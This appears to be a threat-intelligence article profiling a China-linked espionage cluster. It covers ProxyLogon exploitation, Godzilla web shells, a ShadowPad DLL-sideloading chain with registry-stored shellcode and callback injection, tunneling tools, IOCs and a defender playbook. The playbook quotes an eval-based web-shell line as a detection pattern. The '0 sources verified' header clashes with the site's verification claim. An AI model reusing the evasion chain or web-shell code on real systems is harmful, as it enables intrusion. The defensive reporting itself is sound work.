What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

The Typhoon's Little Siblings: SHADOW-EARTH-053 and the New Wave of China-Aligned Cyberespionage Across Asia and NATO

← Threat-Actor-Profile

0 sources verified·10 min read

By Lyrie.ai Cyber Research Division·5/3/2026

TL;DR

A newly disclosed China-linked threat cluster — SHADOW-EARTH-053 — has been conducting a quiet, patient cyberespionage campaign against government ministries, defense contractors, and critical infrastructure across eight countries since at least December 2024. The group exploits ancient-but-still-unpatched Microsoft Exchange vulnerabilities (ProxyLogon chain), drops Godzilla web shells, and after up to eight months of pre-positioning, deploys ShadowPad via a registry-stored, callback-injected DLL sideloading chain that evades most EDR solutions. A sibling cluster (SHADOW-EARTH-054) shares tooling and victimology across roughly half of all targets. Tom Kellermann of TrendAI called them "the younger brother and sister of the Typhoon campaigns" — and the comparison is apt: pre-strategic access, geopolitical timing, and suspected destructive pre-positioning define this operation's DNA.

Background

The Typhoon family — Volt, Salt, Silk — set the template: burrow into critical infrastructure years before the operational need arises, stay invisible until you're needed for espionage or sabotage. The February 2024 CISA/NSA Volt Typhoon advisory confirmed that this model was no longer theoretical. What Trend Micro's TrendAI research division disclosed this week is the next iteration: a new cluster of at least two coordinated Chinese espionage groups operating under the shared umbrella designation SHADOW-EARTH-053 / SHADOW-EARTH-054, with confirmed victims in eight countries and active, unresolved access across multiple defense-sector environments as of late April 2026.

The group was first named publicly on April 30, 2026, in a Trend Micro report authored by researchers Daniel Lunghi and Lucas Silva, with supporting context from The Register's exclusive interview with TrendAI VP Tom Kellermann. Attribution confidence is assessed as medium-high: tooling overlaps with at least three previously documented China-aligned clusters (CL-STA-0049 tracked by Unit 42, REF7707 tracked by Elastic, Earth Alux tracked by Trend Micro), and the use of ShadowPad — a shared-access backdoor licensed exclusively to China's state-sponsored actor ecosystem since 2019 — is considered near-definitive evidence of People's Republic of China (PRC) nexus.

Victim geography: Pakistan, Thailand, Malaysia, India, Myanmar, Sri Lanka, Taiwan, and — most diplomatically significant — Poland, a NATO member. Sectors include government ministries, defense contractors, technology firms, and transportation.

Technical Analysis

Phase 1 — Initial Access: ProxyLogon in 2026

The group's primary entry vector in 2026 is still ProxyLogon — a vulnerability chain disclosed five years ago in March 2021. The chain consists of:

CVE-2021-26855 (SSRF authentication bypass, CVSS 9.8)
CVE-2021-26857 (insecure deserialization for SYSTEM-level code execution)
CVE-2021-26858 and CVE-2021-27065 (post-authentication arbitrary file write for web shell staging)

The fact that this chain remains productive in 2026 is not a failure of threat intelligence — it has appeared on every US government "top exploited vulnerabilities" list since 2021. It is a failure of patch operations. Exchange servers hosting legacy integrations, air-gapped or near-isolated ministry environments, and resource-constrained government agencies in developing nations present an enormous attack surface for adversaries willing to scan patiently.

Where ProxyLogon failed or was already patched, SHADOW-EARTH-053 switched to CVE-2025-55182 (React2Shell), a critical CVSS 10.0 remote code execution vulnerability in React Server Components disclosed in December 2025. This secondary vector was used to deliver a Linux version of NoodleRAT (aka ANGRYREBEL), confirming that the group operates cross-platform and adapts initial access tooling to the target environment.

Phase 2 — Persistence: Godzilla Web Shells

Following successful exploitation, the group deploys Godzilla web shells on compromised Exchange and IIS servers. Godzilla — a modular, open-source web shell favored by multiple Chinese APT clusters — provides encrypted command execution, file management, and plugin-based extensibility. Its traffic pattern is often indistinguishable from legitimate HTTPS to misconfigured web proxies.

Crucially, SHADOW-EARTH-053 is observed waiting up to eight months between initial web shell placement and the final-stage backdoor deployment. This patience is a hallmark of pre-positioning strategy: the group assesses the target, maintains covert access, and only commits the heavier-weight implant when operational confidence is high.

Phase 3 — ShadowPad Deployment via Registry-Stored Shellcode

The ShadowPad backdoor — a modular, encrypted RAT originally developed by APT41 and shared among at least a dozen China-aligned groups since 2019 — is delivered through a sophisticated DLL sideloading chain designed specifically to evade security tooling that relies on process-name matching rather than binary hash verification.

The chain:

1. A legitimate Toshiba Bluetooth Stack executable is renamed to CIATosBtKbd.exe and deployed on the victim system.

2. The renamed binary sideloads a malicious DLL named TosBtKbd.dll.

3. Rather than embedding the ShadowPad payload within the DLL, the loader calls GetComputerNameA to retrieve the hostname and accesses a machine-specific Windows Registry key at:

   HKEY_CURRENT_USER\Software\[ComputerName]

Here it retrieves a binary value named scode — the encrypted shellcode payload. Registry-based payload storage prevents static analysis from identifying the final implant without live execution.

4. The shellcode is written into memory allocated with PAGE_EXECUTE_READWRITE via VirtualAlloc.

5. Execution is achieved via callback injection into EnumDesktopsA — a legitimate Windows API call for desktop enumeration. The shellcode's memory address is passed as a callback parameter, causing the OS to execute the malicious code during what appears to be routine desktop enumeration. This avoids direct execution calls monitored by most EDR hooks.

Persistence is achieved via a Scheduled Task named "M1onltor" (note the substitution of '0' for the second 'o'), configured to execute every five minutes with the highest privilege level.

Phase 4 — Tunneling and Lateral Movement

SHADOW-EARTH-053 deploys a layered tunneling architecture to maintain covert command-and-control:

IOX Proxy — Creates local accounts and sets LocalAccountTokenFilterPolicy=1, enabling Pass-the-Hash across the network for lateral movement.
GOST (GO Simple Tunnel) — Open-source Go-based tunneling tool, configured to establish SOCKS5 proxies and relay-based reverse WebSocket tunnels to external C2 infrastructure.
Wstunnel — Deployed as wt.exe, tunneling SOCKS5 traffic over HTTPS to the same C2 endpoint.

All tunneling tools were staged in C:\Users\Public, a publicly writable directory consistent with the group's documented preference. The use of three separate tools pointing to the same C2 IP suggests operational redundancy — if one tool is detected and blocked, the other channels maintain connectivity.

Lateral movement is accomplished using:

Mimikatz for credential harvesting and privilege escalation
Sharp-SMBExec — a C# reimplementation of SMBExec — for remote execution over SMB
WMIC for backdoor installation on additional hosts
A suspected custom RDP launcher deployed under the system-binary name smss.exe

System binaries (net.exe, PowerShell) are copied with randomized $[RANDOM].log naming patterns (e.g., $D5PLAA1.log, $VMB9AIT.log) to defeat process-name-based detection.

NoodleRAT for Linux Targets

The Linux variant of NoodleRAT (ELF, also tracked as ANGRYREBEL and Nood RAT) was retrieved from C2 server 194.38.11.3:1790 and observed communicating with:

check.office365-update[.]com

Domain registered November 19, 2025. The domain naming convention — impersonating a Microsoft update service — follows a pattern also observed in other SHADOW-EARTH-053 infrastructure, suggesting a shared domain registration profile. GTIG (Google Threat Intelligence Group) attributed the NoodleRAT chain specifically to the overlap cluster UNC6595.

SHADOW-EARTH-054 Overlap

Approximately 50% of SHADOW-EARTH-053's victims were also compromised by SHADOW-EARTH-054 — a related but non-identical cluster sharing identical tool hashes, overlapping CVE exploitation, and the same C2 infrastructure. No direct operational coordination has been confirmed, but the tooling and victim overlap suggest shared supply or shared leadership at the resource provision layer. SHADOW-EARTH-054 has additional network overlaps with:

CL-STA-0049 (Palo Alto Unit 42) — identified in the SquidDoor campaign
REF7707 (Elastic Security Labs)
Earth Alux (Trend Micro)

GLITTER CARP and SEQUIN CARP: The Journalist and Activist Angle

Disclosed concurrently by the Citizen Lab, two additional China-aligned clusters target journalists, civil society, and diaspora activists in what appears to be a coordinated influence suppression and intelligence-collection campaign:

GLITTER CARP (also tracked as UNK_SparkyCarp by Proofpoint) focuses on:

The International Consortium of Investigative Journalists (ICIJ)
Taiwanese semiconductor industry targets
Uyghur, Tibetan, Taiwanese, and Hong Kong diaspora communities

Tactics include AiTM (adversary-in-the-middle) phishing kits, OAuth token harvesting, and 1×1 tracking pixels embedded in phishing emails pointing to attacker infrastructure to fingerprint and confirm email opens.

SEQUIN CARP (UNK_DualTone / UTA0388) targets specific named international journalists — including ICIJ journalist Scilla Alecci — who cover topics of direct sensitivity to the Chinese government.

Both clusters share infrastructure, domain registration patterns, and impersonation techniques across their campaigns, suggesting common resource provisioning with SHADOW-EARTH-053.

Indicators of Compromise (IOCs)

| Type | Indicator | Notes |

|------|-----------|-------|

| IP | 141.164.46.77 | mdync.exe beaconing C2 |

| IP | 96.9.125.227 | GOST/Wstunnel SOCKS5 C2 (port 8067) |

| IP | 194.38.11.3:1790 | ShadowPad + NoodleRAT retrieval server |

| Domain | check.office365-update[.]com | NoodleRAT Linux C2 (reg. Nov 19, 2025) |

| File | CIATosBtKbd.exe | Trojanized Toshiba Bluetooth executable |

| File | TosBtKbd.dll | Malicious sideloaded DLL |

| File | mdync.exe | Custom beaconing tool |

| File | wt.exe | Wstunnel deployment |

| Registry | HKCU\Software\[ComputerName]\scode | Shellcode payload storage |

| Sched. Task | M1onltor | Persistence (every 5 min, SYSTEM) |

| CVEs | CVE-2021-26855/26857/26858/27065 | ProxyLogon chain (Exchange) |

| CVE | CVE-2025-55182 | React2Shell (React Server Components RCE) |

| Technique | EnumDesktopsA callback injection | Shellcode execution evasion |

| Staging path | C:\Users\Public\ | Tool staging directory |

| Rename pattern | $[RANDOM].log | System binary obfuscation |

Lyrie Take

SHADOW-EARTH-053 is textbook strategic pre-positioning. The eight-month dwell time before ShadowPad deployment mirrors Volt Typhoon's modus operandi almost exactly — and Tom Kellermann's concern isn't hyperbolic: we cannot audit for C2-on-sleep-cycle that we don't yet know to look for. If the group pre-positioned destructive capability alongside its espionage tooling, as Volt Typhoon is assessed to have done in US critical infrastructure, then the defense sector victims in eight countries — including a NATO member — may be sitting on activated but dormant sabotage payloads.

What makes this particularly alarming for autonomous security operations: the ShadowPad delivery chain is specifically designed to defeat process-name-based EDR logic. Registry-stored shellcode that executes only at runtime via a legitimate Windows API callback is not going to trigger signature-based AV. It requires behavioral analysis at the kernel level — specifically monitoring for anomalous uses of EnumDesktopsA in contexts involving recently sideloaded DLLs with known-abused binaries. The M1onltor scheduled task name is a plausible-looking system artifact at first glance.

The ProxyLogon exploitation in 2026 is not a sophisticated move — it's a statement about the state of enterprise patching. Five-year-old critical vulnerabilities should be a solved problem. They aren't. The path forward requires continuous attack-surface monitoring, not periodic patch cycles.

Defender Playbook

Immediate Actions:

1. Audit Exchange and IIS patch state. Run Get-ExchangeDiagnosticInfo -Process EdgeTransport -Component HealthChecks and cross-reference against Microsoft's ProxyLogon mitigation checker. Any Exchange server that has not received at least the March 2021 SUs is compromised territory.

2. Scan for Godzilla web shell artifacts. The China Chopper/Godzilla family leaves characteristic ASPX artifacts. Grep your IIS wwwroot and Exchange OWA directories for:

   <%@Page Language="Jscript"%><%eval(Request.Item[...])%>

as well as unusual .aspx files with eval() or Reflection.Assembly.Load patterns.

3. Hunt for M1onltor scheduled tasks. Query across your environment:

   Get-ScheduledTask | Where-Object { $_.TaskName -like "*M1onltor*" }

4. Inspect HKCU registry for scode binary values. The registry key pattern HKCU\Software\[ComputerName] with a scode binary value is a strong IOC with near-zero legitimate use.

5. Block C2 IPs at perimeter. Add 141.164.46.77, 96.9.125.227, and 194.38.11.3 to your threat intelligence firewall block lists immediately.

6. Detect tunneling tool deployment at C:\Users\Public. Monitor file creation events in C:\Users\Public\ for Go-compiled binaries and any executables with names matching wt.exe, IOX components, or GOST configurations.

7. Audit LocalAccountTokenFilterPolicy. A value of 1 at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System significantly expands Pass-the-Hash blast radius. Revert to 0 unless there is a documented operational requirement.

8. Patch CVE-2025-55182 (React2Shell). If running React Server Components, apply the December 2025 Microsoft patches immediately. This vector is actively exploited in-the-wild.

9. Inspect DNS for office365-update[.]com variants. The domain registration pattern suggests additional lookalike domains in the same campaign infrastructure. Query your DNS logs for office365-update.com and variations thereof.

10. Hunt for renamed system binaries. Query Sysmon process creation logs for net.exe or PowerShell hashes executing from non-standard paths with .log extensions.

Strategic Controls:

Deploy NDR (Network Detection and Response) solutions capable of identifying tunneling-over-HTTPS anomalies, particularly SOCKS5 traffic wrapped in WebSocket channels.
Implement kernel-level behavioral monitoring that flags anomalous API call chains involving VirtualAlloc → EnumDesktopsA in non-system processes.
Require scheduled task creation to flow through an approved management plane (e.g., via GPO or Intune) and alert on any task created outside that channel.
For governments and defense contractors: assume Exchange servers with internet exposure have been compromised if ProxyLogon was not patched within the first 30 days of March 2021. Treat those environments as requiring full forensic review before continued operational use.

Sources

1. Trend Micro / TrendAI Research — "Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia" (May 1, 2026)

https://www.trendmicro.com/en_us/research/26/d/inside-shadow-earth-053.html

2. The Hacker News — "China-Linked Hackers Target Asian Governments, NATO State, Journalists, and Activists" (May 2, 2026)

https://thehackernews.com/2026/05/china-linked-hackers-target-asian.html

3. The Register — "Novel Chinese spy group found in critical networks in Poland, Asia" — Exclusive interview with Tom Kellermann (TrendAI VP) (April 30, 2026)

https://www.theregister.com/2026/04/30/chinese_spies_lurking_networks

4. Citizen Lab — "How Chinese Actors Use Impersonation and Stolen Narratives to Perpetuate Digital Transnational Repression" (2026)

https://citizenlab.ca/research/how-chinese-actors-use-impersonation-and-stolen-narratives-to-perpetuate-digital-transnational-repression/

5. GBHackers — "China-Aligned Hackers Deploy ShadowPad in Multi-Stage Espionage Campaign" (May 1, 2026)

https://gbhackers.com/china-hackers-deploy-shadowpad/

Lyrie.ai Cyber Research Division — Senior Analyst Desk